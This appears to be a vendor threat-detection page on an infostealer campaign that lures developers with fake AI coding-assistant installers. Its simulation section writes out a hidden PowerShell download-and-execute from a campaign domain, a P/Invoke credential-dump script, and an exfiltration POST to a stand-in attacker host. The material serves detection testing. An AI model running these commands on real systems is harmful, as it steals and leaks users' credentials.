SEO Poisoning Campaign Uses Gemini and Claude Code Lures to Deliver an Infostealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Financially motivated eCrime actors are using SEO poisoning to push fake domains that mimic installers for AI coding assistants. Victims who copy and paste a single PowerShell command from these pages trigger a fileless infostealer that executes fully in memory. The malware steals credentials, session cookies, VPN keys, and sensitive files before exfiltrating the data in encrypted form to a command-and-control server. The campaign is aimed at Windows developer workstations and blends into normal activity by abusing familiar developer tools.
Investigation
EclecticIQ analysts traced the malicious infrastructure to .co.com domains serving PowerShell download strings through irm and iex. The first-stage script launches a hidden PowerShell window using Shell.Application.ShellExecute, then loads additional C# types to gather credentials, system details, and other valuable data. Exfiltration was observed over HTTP and HTTPS to events.msft23.com and events.ms709.com using specific URL paths. Passive DNS analysis linked the operation to a bulletproof hosting provider in the Netherlands and to a wider cluster of typosquatted domains.
Mitigation
Defenders should detect and block the irm | iex execution pattern, hidden PowerShell windows, and suspicious Add-Type usage involving P/Invoke calls. Organizations should enforce PowerShell Constrained Language Mode and use AppLocker or WDAC to prevent script execution from internet-sourced content. Restricting browser clipboard write access and enforcing short-lived OAuth tokens for developer accounts can further reduce exposure. Developers should also be trained to avoid copy-paste commands from untrusted websites.
Response
Security teams should alert on PowerShell processes launched with -WindowStyle Hidden or invoked through Shell.Application.ShellExecute. These events should be correlated with outbound HTTP requests to domains matching *-setup.com or events.*.com, especially when the paths /take, /process, or /validate appear. If this behavior is detected, isolate the affected endpoint, collect PowerShell logs (process creation and script block logging), and perform forensic collection of browser data and credential stores.
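The Mitigation and Response sections above describe the detection logic in words; the following is an added Python example (not the page's or the vendor's own rule) that runs that logic over constructed sample telemetry. The event field names (host, ts, cmdline, script_block, url), the 10-minute correlation window and the hostnames in the samples are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Traits named in Mitigation/Response: hidden window, irm|iex cradle, Add-Type with P/Invoke.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
CRADLE_RE = re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b.*\|\s*(?:iex|invoke-expression)\b", re.I)
# Beacon pattern from Response: host *-setup.com or events.*.com, path /take, /process or /validate.
C2_HOST_RE = re.compile(r"^(?:[^.]+-setup\.com|events\.[^.]+\.com)$", re.I)
C2_PATHS = {"/take", "/process", "/validate"}

def score_process(cmdline, script_block=""):
    """Return the suspicious traits present in one PowerShell launch (empty list if benign)."""
    hits = []
    if HIDDEN_RE.search(cmdline):
        hits.append("hidden_window")
    if CRADLE_RE.search(cmdline) or CRADLE_RE.search(script_block):
        hits.append("irm_iex_cradle")
    if "add-type" in script_block.lower() and "dllimport" in script_block.lower():
        hits.append("addtype_pinvoke")
    return hits

def matches_c2(url):
    u = urlparse(url)
    return bool(C2_HOST_RE.match(u.hostname or "")) and u.path in C2_PATHS

def correlate(proc_events, net_events, window=timedelta(minutes=10)):
    """Alert when a suspicious launch is followed, on the same host, by a C2-pattern request."""
    alerts = []
    for p in proc_events:
        traits = score_process(p["cmdline"], p.get("script_block", ""))
        if not traits:
            continue  # a beacon-shaped URL alone is not enough; the launch must look bad too
        for n in net_events:
            if n["host"] == p["host"] and p["ts"] <= n["ts"] <= p["ts"] + window and matches_c2(n["url"]):
                alerts.append({"host": p["host"], "traits": traits, "url": n["url"]})
    return alerts

# Constructed sample telemetry (hostnames and timestamps are made up for the example).
T0 = datetime(2026, 5, 25, 9, 0)
PROC = [
    {"host": "dev01", "ts": T0, "script_block": '$t = @"\n[DllImport("advapi32.dll")] ...\n"@\nAdd-Type $t',
     "cmdline": 'powershell.exe -WindowStyle Hidden -Command "irm https://gemini-setup.com/i.ps1 | iex"'},
    {"host": "dev02", "ts": T0, "cmdline": "powershell.exe -File build.ps1"},  # normal developer use
]
NET = [
    {"host": "dev01", "ts": T0 + timedelta(minutes=2), "url": "https://events.msft23.com/take"},
    {"host": "dev02", "ts": T0 + timedelta(minutes=2), "url": "https://events.msft23.com/take"},
]
```

Running correlate(PROC, NET) alerts only on dev01: dev02 made the same beacon-shaped request, but nothing about its PowerShell launch was suspicious, which is the correlation the Response section asks for.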
graph TB
%% Class Definitions
classDef action fill:#99ccff
classDef tool fill:#ffdd99
classDef malware fill:#ff9999
classDef process fill:#ccffcc
classDef operator fill:#ff9900

%% Nodes – Actions
initial_access["<b>Action</b> – <b>T1189 Drive-by Compromise</b>: SEO-poisoned search results deliver fake Gemini CLI / Claude Code installation page.<br/><b>Sub-techniques</b> T1204.001 User Execution (malicious link) and T1204.004 User Execution (copy-paste PowerShell one-liner)."]
class initial_access action
execution["<b>Action</b> – <b>T1059.001 PowerShell</b>: In-memory script executed via Shell.Application.ShellExecute, reflective download/execute (irm|iex).<br/><b>Obfuscation</b> T1027 and T1027.016 junk code."]
class execution action
defense_evasion["<b>Action</b> – <b>T1562.001 Disable Security Tools</b>: Patch amsi.dll, disable ETW, sandbox check for qemu-ga.<br/><b>Sub-technique</b> T1562.006 Disable Event Tracing for Windows."]
class defense_evasion action
credential_access["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b>: Extract browser credentials and cookies.<br/><b>Additional techniques</b> T1555.004 Windows Credential Manager, T1552.001 Credentials in Files, T1552.002 Credentials in Registry, T1539 Steal Web Session Cookie, T1550.004 Web Session Cookie."]
class credential_access action
discovery["<b>Action</b> – <b>T1057 Process Discovery</b>: Enumerate processes via Restart Manager.<br/><b>Additional techniques</b> T1083 File and Directory Discovery, T1217 Browser Information Discovery, T1497.002 Virtualization / Sandbox Evasion."]
class discovery action
collection["<b>Action</b> – <b>T1005 Data from Local System</b>: Gather user files (*.txt, *.docx) and cloud-synced directories (T1039)."]
class collection action
command_and_control["<b>Action</b> – <b>T1071.001 Web Protocols</b>: HTTPS beacons to events.msft23.com / events.ms709.com endpoints (/take, /process, /validate).<br/><b>Encryption</b> RSA-encrypted task list (T1573) and payload download (T1105 Ingress Tool Transfer)."]
class command_and_control action
exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b>: Encrypted exfiltration of harvested data.<br/><b>Sub-technique</b> T1020 Automated Exfiltration."]
class exfiltration action

%% Nodes – Tools / Malware
tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows scripting engine used for in-memory execution."]
class tool_powershell tool
tool_shellexecute["<b>Tool</b> – <b>Name</b>: Shell.Application.ShellExecute<br/><b>Description</b>: Launches hidden windows for script execution."]
class tool_shellexecute tool
tool_amsi_patch["<b>Tool</b> – <b>Name</b>: AMSI Patch<br/><b>Description</b>: Modifies amsi.dll to bypass script scanning."]
class tool_amsi_patch tool
tool_etw_disable["<b>Tool</b> – <b>Name</b>: ETW Disable<br/><b>Description</b>: Disables Event Tracing for Windows to avoid detection."]
class tool_etw_disable tool
tool_credmanager["<b>Tool</b> – <b>Name</b>: CredEnumerate API<br/><b>Description</b>: Retrieves credentials from Windows Credential Manager."]
class tool_credmanager tool
tool_ssh_reg["<b>Tool</b> – <b>Name</b>: Registry Harvest<br/><b>Description</b>: Reads WinSCP and PuTTY stored passwords from registry keys."]
class tool_ssh_reg tool
tool_vpn["<b>Tool</b> – <b>Name</b>: VPN Config Collector<br/><b>Description</b>: Gathers VPN configuration files for potential reuse."]
class tool_vpn tool
tool_wallet["<b>Tool</b> – <b>Name</b>: Crypto Wallet Stealer<br/><b>Description</b>: Extracts wallet files and private keys."]
class tool_wallet tool

%% Connections – Attack Flow
initial_access -->|leads_to| execution
execution -->|uses| tool_powershell
execution -->|uses| tool_shellexecute
execution -->|contains| tool_amsi_patch
execution -->|contains| tool_etw_disable
execution -->|leads_to| defense_evasion
defense_evasion -->|uses| tool_amsi_patch
defense_evasion -->|uses| tool_etw_disable
defense_evasion -->|leads_to| credential_access
credential_access -->|uses| tool_credmanager
credential_access -->|uses| tool_ssh_reg
credential_access -->|uses| tool_vpn
credential_access -->|uses| tool_wallet
credential_access -->|leads_to| discovery
discovery -->|leads_to| collection
collection -->|leads_to| command_and_control
command_and_control -->|uses| tool_powershell
command_and_control -->|leads_to| exfiltration
Attack Flow
Detections
- Download or Upload via Powershell (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Call Suspicious .NET Methods from Powershell (via powershell)
- IOCs (HashSha256) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer Part 2
- IOCs (HashSha256) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer Part 1
- IOCs (SourceIP) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
- IOCs (DestinationIP) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
- Detect C2 Beacon Pattern with Specific URI Paths [Windows Network Connection]
- Fileless PowerShell Infostealer Execution [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands:
An attacker compromises a low-privileged user account and runs a PowerShell one-liner via cmd.exe. The one-liner uses irm (Invoke-RestMethod) to fetch a malicious PowerShell script from events.msft23.com, pipes it to iex (Invoke-Expression) to execute the payload entirely in memory, and hides the PowerShell window to avoid shoulder surfing. The payload then loads a .NET type with Add-Type to perform credential enumeration through the CredEnumerate API and exfiltrates the harvested data over HTTPS. All steps are executed without writing files to disk, matching the "fileless" description.

# Step 1 – Hidden PowerShell launch
powershell.exe -WindowStyle Hidden -Command "irm https://events.msft23.com/payload.ps1 -UseBasicParsing | iex"

The downloaded payload.ps1 (executed in memory) contains:

# Step 2 – Load .NET type for credential enumeration
$count = 0; $ptr = [IntPtr]::Zero
$type = @"
using System;
using System.Runtime.InteropServices;
public class Cred {
    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials);
}
"@
Add-Type $type
# Step 3 – Invoke credential dump and exfiltrate
$null = [Cred]::CredEnumerate("*", 0, [ref]$count, [ref]$ptr)
$data = "Collected $count credentials"
Invoke-RestMethod -Method Post -Uri https://attacker.c2/exfil -Body $data

This sequence generates the command-line fragments that the Sigma rule matches:
- powershell.exe -WindowStyle Hidden
- irm events.msft23.com | iex
- Add-Type
- advapi32.dll!CredEnumerate
- Regression Test Script: The following script reproduces the behavior on a test workstation. Run it from an elevated PowerShell prompt (the HttpListener prefix http://+:8080/ requires administrator rights).

# Fileless PowerShell Infostealer Simulation – TC-20260525-A7Z3K
# ------------------------------------------------------------
# Mock payload.ps1 content (hosted locally for safe testing). The live lure pulled the script
# from events.msft23.com; the mock is served by the local listener below so the test never
# contacts campaign infrastructure.
$payload = @'
$count = 0; $ptr = [IntPtr]::Zero
$type = @"
using System;
using System.Runtime.InteropServices;
public class Cred {
    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials);
}
"@
Add-Type $type
$null = [Cred]::CredEnumerate("*", 0, [ref]$count, [ref]$ptr)
$data = "Collected $count credentials"
# Simulate exfiltration to a harmless endpoint
Invoke-RestMethod -Method Post -Uri "https://httpbin.org/post" -Body $data
'@

# Write the mock payload to a temp location for the test (simulating remote hosting)
$tempPath = Join-Path $env:TEMP "payload.ps1"
Set-Content -Path $tempPath -Value $payload -Encoding UTF8

# Serve the payload via a simple local HTTP listener; it must be listening before the client runs
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://+:8080/")
$listener.Start()
Write-Host "Serving mock payload on http://localhost:8080/payload.ps1"

# Step 1 – Execute hidden PowerShell that downloads & runs the mock payload in memory
$command = 'powershell.exe -WindowStyle Hidden -Command "irm http://localhost:8080/payload.ps1 -UseBasicParsing | iex"'
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $command" -WindowStyle Hidden

# Answer exactly one request, then stop the listener so the script returns
$context = $listener.GetContext()
if ($context.Request.Url.AbsolutePath -eq "/payload.ps1") {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $context.Response.ContentLength64 = $bytes.Length
    $context.Response.OutputStream.Write($bytes, 0, $bytes.Length)
}
$context.Response.Close()
$listener.Stop()
- Cleanup Commands: Remove temporary files, stop the HTTP listener, and end any hidden PowerShell the simulation left behind.

# Cleanup after simulation
Remove-Item -Path (Join-Path $env:TEMP "payload.ps1") -ErrorAction SilentlyContinue
# Stop the local HTTP listener (if still running)
if ($listener) {
    if ($listener.IsListening) { $listener.Stop() }
    $listener.Close()
}
# Hidden windows have no title, so match on the command line instead
Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
    Where-Object { $_.CommandLine -match "payload\.ps1" } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }